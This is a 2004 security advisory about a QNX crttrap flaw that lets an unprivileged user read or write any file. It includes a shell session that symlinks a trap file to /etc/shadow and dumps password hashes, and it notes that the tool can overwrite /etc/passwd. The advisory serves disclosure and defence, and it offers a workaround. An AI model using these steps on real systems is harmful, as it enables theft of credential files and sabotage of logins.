The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
QNX Crrtrap Arbitrary File Read/Write Vulnerability
------------------------------------------------------------------------
SUMMARY
crrtrap is "a tool used by QNX to detect video hardware and start the
correct driver for <http://www.qnx.com> QNX". crttrap has a '-c' flag to
specify where trap file will be written. Combined with 'trap' flag it is
possible to read/write any file in the disk.
DETAILS
By default crttrap writes and reads trap files found in
"/etc/system/config". This directory is owned by root, therefore, we don't
have permission to write. The crttrap program filters "../" to prevent
directory transversal vulnerabilities. However, it doesn't check for "/"
(without any dots). This makes it possible to create a sub directory, with
the permission settings bound to our (non-root) group.
Once such a directory exists, we can now manipulate our trap file:
$ crttrap -c tmp/rfdslabs trap
/usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
/usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
$ cd /etc/system/config/tmp
$ ls -la
total 52
drwxrwxr-x 2 root 100 2048 Dec 11 12:40 .
drwxrwxr-x 3 root root 2048 Dec 11 12:35 ..
-rw-r--r-- 1 root 100 21671 Dec 11 12:40 rfdslabs
$ rm -f rfdslabs
$ ln -s /etc/shadow rfdslabs
$ crttrap -c tmp/rfdslabs dump
root:21QjUKxP9gEJK:0:0:0
sandimas:91UzHxvt3x1n2:0:0:0
We are also able to overwrite any file with 'trap' switch. As an example,
an attacker can corrupt '/etc/passwd' and make login attempts fail every
time.
PS: On 31 May 2002, Simon Oullette had found a bug in crttrap '-c' flag in
QNX 4.25. But his exploitation technique won't work with newest versions
because crttrap opens "/etc/system/config" and its sub directories.
Workaround:
We suggest that you remove crttrap's suid bit until QNX releases a patch.
Timeline:
10 Dec 2004: Vulnerability detected
11 Dec 2004: Advisory written; rfdslabs contacts QNX
20 Dec 2004: QNX replies back rfdslabs
28 Dec 2004: Advisory released to public
ADDITIONAL INFORMATION
The information has been provided by <mailto:julio@rfdslabs.com.br> Julio
Cesar Fort.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
